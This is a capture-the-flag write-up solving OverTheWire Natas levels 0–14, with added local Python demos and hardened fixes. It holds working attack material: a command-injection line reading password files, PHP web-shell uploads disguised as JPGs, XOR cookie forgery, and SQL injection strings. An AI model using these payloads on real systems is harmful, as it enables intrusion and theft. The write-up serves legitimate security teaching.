Natas 0 - 14
Natas is a web-based wargame from OverTheWire (OTW). I have tried to use both the Python (requests) method and the Burp Suite method wherever applicable while solving the levels.
Each level of natas consists of its own website located at http://natasX.natas.labs.overthewire.org, where X is the level number. There is no SSH login. To access a level, enter the username for that level (e.g. natas0 for level 0) and its password.
Each level has access to the password of the next level. Your job is to somehow obtain that next password and level up. All passwords are also stored in /etc/natas_webpass/. E.g. the password for natas5 is stored in the file /etc/natas_webpass/natas5 and is only readable by natas4 and natas5.
Checked the page source (right click, View Page Source) and got the password for the next level.
After some minor enumeration we found a folder called files on the server. Went to the files directory and got the next password in users.txt.
robots.txt has this entry
The directory is disallowed for Google's crawler, so there must be something interesting in it. Ha, got users.txt in it.
This page can only be viewed when the Referer header is natas5's host.
Capture the traffic with the Burp proxy, change the value of the Referer header and forward the request to the browser.
The same thing can be done with Python's requests library: create a session and set the Referer header on it.
The screen says "not logged in" even after giving the password.
Capturing the request in Burp Suite, we see a cookie with loggedin=0. Set the value to 1 and forward the request to the browser; got the password for natas6.
Similarly we can use Python's requests library and change the cookie.
Inspected the page code; the script checking the password was including a page called secret.inf. Checked that page and got the secret.
To do this with Python I have to create a session in my script and then send a POST request with the secret. To test this theory I first initiate the connection through the script and then do the POST request.
Here I am just creating a session and printing what I get back: the response is the HTML page that has the submit query button in it. It will also print the headers.
Now I add a POST request to my script which sends the secret, thus triggering this query. This sends the secret, with the correct headers, as a POST request to the URL, and we get the password.
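The three checks above (Referer header, loggedin cookie, and a POST form field compared with a static secret) are all taken from data the client sends, which is why Burp or a requests session can change them freely. The following is an added example, not code from the writeup: a constructed local server that performs the same three checks, and a client that sends the plain and the modified values, so the behaviour can be reproduced offline. The host name, the secret and the paths are assumptions made up for the demo. The defender's takeaway is that authorisation state has to live on the server (a session bound to a random, unguessable identifier), never in a header or cookie value the browser is trusted to set.

```python
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-ins; the real levels' host and secret are not used here.
EXPECTED_REFERER = "http://natas5.example.test/"
SECRET = "constructed-secret"


class LevelHandler(BaseHTTPRequestHandler):
    """Reproduces the three checks the writeup bypasses: a Referer check,
    a loggedin cookie, and a POST form field compared with a static secret."""

    def _reply(self, text: str) -> None:
        body = text.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self) -> None:
        if self.path == "/referer":
            ok = self.headers.get("Referer", "").startswith(EXPECTED_REFERER)
        elif self.path == "/cookie":
            raw = self.headers.get("Cookie", "")
            cookies = dict(p.strip().split("=", 1) for p in raw.split(";") if "=" in p)
            ok = cookies.get("loggedin") == "1"
        else:
            ok = False
        self._reply("granted" if ok else "denied")

    def do_POST(self) -> None:
        length = int(self.headers.get("Content-Length", "0"))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        ok = self.path == "/secret" and form.get("secret", [""])[0] == SECRET
        self._reply("granted" if ok else "denied")

    def log_message(self, *args) -> None:  # silence per-request logging
        pass


def start_server() -> HTTPServer:
    srv = HTTPServer(("127.0.0.1", 0), LevelHandler)  # port 0 = any free port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch(base: str, path: str, headers=None, data=None) -> str:
    """One request; the headers dict is where the Referer or Cookie is set,
    exactly as Burp's intercept or a requests.Session would set them."""
    req = urllib.request.Request(base + path, data=data, headers=headers or {})
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.read().decode()


def demo() -> dict:
    """Run every variant against the local server and collect the verdicts."""
    srv = start_server()
    base = "http://127.0.0.1:%d" % srv.server_address[1]
    form = urllib.parse.urlencode({"secret": SECRET, "submit": "submit"}).encode()
    try:
        return {
            "referer_plain": fetch(base, "/referer"),
            "referer_forged": fetch(base, "/referer", {"Referer": EXPECTED_REFERER}),
            "cookie_plain": fetch(base, "/cookie", {"Cookie": "loggedin=0"}),
            "cookie_forged": fetch(base, "/cookie", {"Cookie": "loggedin=1"}),
            "secret_post": fetch(base, "/secret",
                                 {"Content-Type": "application/x-www-form-urlencoded"}, form),
        }
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(name, verdict)
```

Running the block prints "denied" for the plain Referer and the loggedin=0 cookie and "granted" for the forged values and the POSTed secret; nothing about the server changed between the two, only the bytes the client chose to send.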
The index page routes the request based on the query parameter passed to it: the about page gives "about" and the home page gives "home" in the query parameter. We replace the query parameter value to get the password.
Same request using Python: passed the parameters through the amazing Python requests library.
Found an encoded string in the application logic for authentication.
I know the encoded string, so if I reverse the encoding I should get the secret, and when I pass the secret in the POST call I should get the password:
- hex2bin first
- string reverse
- base64 decode
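Reading the three steps backwards gives the transformation the application applied: base64 encode, reverse the string, then hex encode. The following is an added example, not the writeup's script, that implements both directions in Python so the reversal can be checked on a constructed secret; the secret value is made up for the demo. The lesson for the defender is the obvious one: a chain of reversible encodings is not a secret-keeping mechanism, and anything that has to stay secret has to be compared server-side against a hash or kept out of the client-visible code entirely.

```python
import base64
import binascii


def obfuscate(secret: str) -> str:
    """The application's transformation: base64 encode, strrev, bin2hex."""
    b64 = base64.b64encode(secret.encode()).decode()
    return binascii.hexlify(b64[::-1].encode()).decode()


def recover(encoded_hex: str) -> str:
    """Undo it in the opposite order: hex2bin, string reverse, base64 decode."""
    reversed_b64 = binascii.unhexlify(encoded_hex).decode()
    return base64.b64decode(reversed_b64[::-1]).decode()


if __name__ == "__main__":
    demo_secret = "constructed-secret"  # made up for the demo
    encoded = obfuscate(demo_secret)
    print(encoded, "->", recover(encoded))
```

Each step is an exact inverse of the one the application applied, so the recovered string is identical to the original secret, not merely similar.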
The code takes a keyword from the UI and runs grep on a dictionary file on the system directly through the passthru function. Since it runs in a shell, we can pass other commands after a ;
dmeg; cat /etc/natas_webpass/natas10
The function in this level checks for bad characters. We can use grep itself to exploit it: grep takes more than one file as input, so in the $file variable we pass a letter and the path of the password file.
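Both levels share one root cause: the keyword is spliced into a command line that a shell interprets, and a character blacklist does not remove the problem because grep will happily read a second file name out of the same string. The following is an added example, not the level's PHP, that recreates the vulnerable shape in Python beside a hardened version. The hardened version passes the keyword as a single argv element with no shell involved, so a ; or a space inside it is just part of the pattern. The dictionary file and the injected marker are constructed for the demo; the injected text only echoes a word, which is enough to show that the shell interpreted it.

```python
import os
import subprocess
import tempfile


def make_dictionary() -> str:
    """Constructed stand-in for the system dictionary file."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as fh:
        fh.write("apple\nbanana\ncherry\n")
    return path


def search_vulnerable(keyword: str, dictionary: str) -> str:
    """Same shape as passthru("grep -i $key dictionary"): the keyword is
    interpolated into a command line that a shell parses, so shell
    metacharacters in it are interpreted."""
    cmd = f"grep -i {keyword} {dictionary}"
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True,
                            stdin=subprocess.DEVNULL)
    return result.stdout


def search_hardened(keyword: str, dictionary: str) -> str:
    """No shell: the keyword is exactly one argv element, however many
    spaces, semicolons or pipes it contains, and "--" stops grep from
    treating a keyword that starts with "-" as an option."""
    argv = ["grep", "-i", "--", keyword, dictionary]
    result = subprocess.run(argv, capture_output=True, text=True,
                            stdin=subprocess.DEVNULL)
    return result.stdout


if __name__ == "__main__":
    path = make_dictionary()
    print(search_hardened("an", path), end="")
    print(search_vulnerable("zzz; echo INJECTED", path), end="")
    print(repr(search_hardened("zzz; echo INJECTED", path)))
    os.remove(path)
```

With the hardened function, a keyword such as "zzz /etc/passwd" is searched for literally as the pattern "zzz /etc/passwd" and never becomes a second file argument, which closes the bypass the level uses without needing a character blacklist at all.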
The cookies are base64 encoded, so we have to decode them first. Use the decoded value and the ciphertext to get the XOR key, use the XOR key to encrypt data with showpassword set to yes, and send that as the cookie.
Base64 decoded value -
%3d is basically = in URL encoding, because somebody decided for it to be so.
Details about the XOR known-plaintext attack: https://alamot.github.io/xor_kpa/
We should not forget that:
- plaintext ⊕ key = encrypted_text
- encrypted_text ⊕ plaintext = key
- encrypted_text ⊕ key = plaintext
This basically means that if I "encrypt" the ciphertext using the plaintext as the key, I get the XOR encryption key.
XOR key: qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq
Use this key to get the new cookie.
Cookie encrypted with XOR using this key: ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK
Got the password.
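The three identities above are all the attack needs, and the repeating pattern in the recovered key (qw8J over and over) is what makes a short key usable against a plaintext of any length. The following is an added example, not the writeup's script, that carries the procedure through in Python: decode the cookie, XOR it against the known plaintext to get the key stream, find the shortest repeating unit, and re-encrypt a modified plaintext under it. The key unit is the one the writeup recovered; the plaintext layout and the demo cookie are constructed for the example, not the level's real values. From the defender's side this is the reason a repeating-key XOR is not encryption: anyone who knows or can guess part of the plaintext recovers the key, and nothing detects that the cookie was altered. Server-side session storage, or at least authenticated encryption with a key the client never sees, is the fix.

```python
import base64
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key (the same routine encrypts and decrypts)."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def recover_key_stream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """encrypted_text XOR plaintext = key, byte for byte, as far as the
    known plaintext reaches."""
    return xor_bytes(ciphertext[: len(known_plaintext)], known_plaintext)


def shortest_period(stream: bytes) -> bytes:
    """Find the repeating unit of a key stream such as 'qw8Jqw8Jqw8J...'.
    The known plaintext must be at least twice the key length for the
    period to be unambiguous; otherwise the whole stream is returned."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


def forge_cookie(cookie_b64: str, known_plaintext: bytes, new_plaintext: bytes) -> str:
    """Decode the cookie, recover the key from the known plaintext, and
    re-encrypt the modified plaintext under the same key."""
    ciphertext = base64.b64decode(cookie_b64)
    key = shortest_period(recover_key_stream(ciphertext, known_plaintext))
    return base64.b64encode(xor_bytes(new_plaintext, key)).decode()


# Constructed demo values (not the level's real cookie or plaintext). The key
# unit is the one the writeup recovered; the plaintext layout is an assumption.
DEMO_KEY = b"qw8J"
ORIGINAL = b'{"showpassword":"no","bgcolor":"#ffffff"}'
MODIFIED = b'{"showpassword":"yes","bgcolor":"#ffffff"}'
DEMO_COOKIE = base64.b64encode(xor_bytes(ORIGINAL, DEMO_KEY)).decode()


def demo() -> tuple:
    """Return (recovered key unit, plaintext the server would see from the forged cookie)."""
    forged = forge_cookie(DEMO_COOKIE, ORIGINAL, MODIFIED)
    recovered = shortest_period(recover_key_stream(base64.b64decode(DEMO_COOKIE), ORIGINAL))
    return recovered, xor_bytes(base64.b64decode(forged), DEMO_KEY)


if __name__ == "__main__":
    key, seen_by_server = demo()
    print(key, seen_by_server)
```

Decrypting the forged cookie with the original key yields the modified plaintext exactly, which is the whole point: the server cannot tell the forged cookie from one it issued itself.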
There is an image upload option, so I created a PHP file with the jpg extension that basically cats the password file:
echo "<?php echo system(\"cat /etc/natas_webpass/natas13\"); ?>" > natas12.jpg
Uploaded the jpg file to the server.
Changed the randomly generated filename in the request from .jpg to .php using Burp Suite. The file was created with the .php extension.
Opened the file path in the browser and got the password.
The only change in this level from the previous one is that there is now a check and only jpg files can be uploaded.
We need to make our PHP file with the jpeg extension look like a legitimate jpeg file. How do we do that? How does the server verify a file type?
In this case we need to know how file types are recognised; after some research you will stumble upon something called file signatures, or magic numbers. A JPG file contains the following hex signature: FF D8 FF DB.
Ctrl+A for adding null bytes: add 4 null bytes to hold the hex signature for jpg.
We will use Python to add the signature bytes.
Another way of doing this is to create a new file and concatenate the signature hex string to
<? passthru($_GET["cmd"]); ?>
which is also a way to get a shell in PHP.
We are going to use this command to get the password for level 14:
<?php echo system(\"cat /etc/natas_webpass/natas14\"); ?>
The file is recognised as an image file and contains our payload. Sending this file now.
After that the payload was created properly and the PHP file was uploaded.
All I had to do was pass ?cmd="mycommand" to the passthru in my payload to run it on the underlying machine.
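The level's check only looks at the first bytes of the upload, which is why prepending the signature is enough. The following is an added example, not the writeup's script, that builds the signature-plus-payload file in Python (the payload is a constructed harmless marker, not the level's command) and then shows the difference between that naive magic-byte check and a check that walks the JPEG marker segments: the polyglot passes the first and fails the second, because the bytes after FF DB are read as a segment length that runs past the end of the file. The structural walk and the minimal JFIF skeleton are constructed for the example; the walk is a sanity check, not a decoder. Even a structural check is not the real fix for an upload handler: the uploaded bytes should be re-encoded server-side into a fresh image, stored under a server-chosen name with a fixed extension, and served from a location where nothing is ever executed.

```python
JPEG_MAGIC = bytes.fromhex("FFD8FFDB")  # the signature the writeup prepends


def build_polyglot(payload: bytes) -> bytes:
    """What the upload did: signature bytes followed by the PHP payload."""
    return JPEG_MAGIC + payload


def has_jpeg_magic(data: bytes) -> bool:
    """The naive check the level performs: only the first bytes are examined."""
    return data[:4] == JPEG_MAGIC


def jpeg_structure_ok(data: bytes) -> bool:
    """Walk the JPEG marker segments instead of trusting the first bytes.
    Each segment is FF xx, then (for most markers) a 2-byte big-endian
    length that includes itself. True only if every segment fits inside the
    file and the file ends with EOI. A structural sanity check, not a decode."""
    if data[:2] != b"\xff\xd8":  # SOI
        return False
    i = 2
    while i + 2 <= len(data):
        if data[i] != 0xFF:
            return False
        marker = data[i + 1]
        if marker == 0xD9:  # EOI: well-formed end
            return True
        if marker == 0xDA:  # SOS: entropy-coded data runs until EOI
            return data.endswith(b"\xff\xd9")
        if 0xD0 <= marker <= 0xD7 or marker in (0x01, 0xD8):
            i += 2  # standalone markers carry no length field
            continue
        if i + 4 > len(data):
            return False
        length = int.from_bytes(data[i + 2:i + 4], "big")
        if length < 2 or i + 2 + length > len(data):
            return False  # segment claims more bytes than the file has
        i += 2 + length
    return False


def minimal_jpeg_skeleton() -> bytes:
    """Constructed SOI + APP0 (JFIF) + EOI: structurally valid, no image data."""
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    return (b"\xff\xd8" + b"\xff\xe0" + (len(app0) + 2).to_bytes(2, "big")
            + app0 + b"\xff\xd9")


# Constructed harmless payload; stands in for the level's command.
DEMO_PAYLOAD = b"<?php echo 'constructed marker'; ?>"


if __name__ == "__main__":
    poly = build_polyglot(DEMO_PAYLOAD)
    print("polyglot magic:", has_jpeg_magic(poly), "structure:", jpeg_structure_ok(poly))
    real = minimal_jpeg_skeleton()
    print("skeleton magic:", has_jpeg_magic(real), "structure:", jpeg_structure_ok(real))
```

Note that the naive check also fails in the other direction: the JFIF skeleton starts FF D8 FF E0, so a fixed four-byte comparison against FF D8 FF DB rejects a perfectly ordinary JPEG while accepting the polyglot.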
Since the code is not sanitising the input taken from the POST request sent by the user and is using it directly in the query, we can send bad inputs that comment out the password check and so bypass it.
What a SQL injection attack vector basically does is either send a parameter that comments out a portion of the SQL query, or use a condition that will always be true.
All of these combinations will work.
- The (") tells the SQL engine that the string ends here (in this injection, after we have given the username) and (#) tells it that everything after this is a comment.
- The (") in the first position tells the SQL engine that the username is already over, then gives it a statement that will always be true, here (1=1), followed by # telling the engine to comment out the rest. Example 1 was for the case when we knew the username and example 2 for the case when we did not know the user or the password.
- The 3rd is for when we are sure about the user, which is natas15. For the password it uses (") first to close the quote, followed by an or with a statement that will always be true, because otherwise the password field would be sent blank and would not pass as is.
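The following is an added example, not the level's PHP, that reproduces the three cases above against an in-memory SQLite database and places the parameterised query the code should have used next to the vulnerable one. SQLite is used because it ships with Python; two details differ from the MySQL-style query in the writeup and are adjusted here: string literals use single quotes, and the end-of-line comment is -- rather than #. The table, the user row and the password are constructed for the demo. With placeholders the database driver sends the values separately from the statement, so a quote or a comment marker inside the password is compared as data and never changes the query.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed users table with one row (not the level's real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('natas15', 'constructed-password')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The level's shape: user input pasted straight into the SQL text, so a
    quote ends the string early and -- comments out the password check."""
    query = (f"SELECT * FROM users WHERE username='{username}' "
             f"AND password='{password}'")
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened: placeholders keep the statement fixed and the inputs as data."""
    query = "SELECT * FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone() is not None


# The three cases from the writeup, translated to SQLite quoting/comment syntax.
CASE_KNOWN_USER = ("natas15' --", "anything")          # close the string, comment the rest
CASE_UNKNOWN_USER = ("' or 1=1 --", "anything")         # always-true condition, comment the rest
CASE_PASSWORD_FIELD = ("natas15", "' or 1=1 --")        # injection through the password field


def demo() -> dict:
    conn = make_db()
    cases = {"correct": ("natas15", "constructed-password"),
             "known_user": CASE_KNOWN_USER,
             "unknown_user": CASE_UNKNOWN_USER,
             "password_field": CASE_PASSWORD_FIELD}
    return {name: (login_vulnerable(conn, *creds), login_parameterized(conn, *creds))
            for name, creds in cases.items()}


if __name__ == "__main__":
    for name, (vuln, safe) in demo().items():
        print(f"{name:15} vulnerable={vuln} parameterized={safe}")
```

Only the correct credentials log in through the parameterised query; all three injected inputs succeed against the string-built query and fail against the placeholder version, which is the single change the level's code needs.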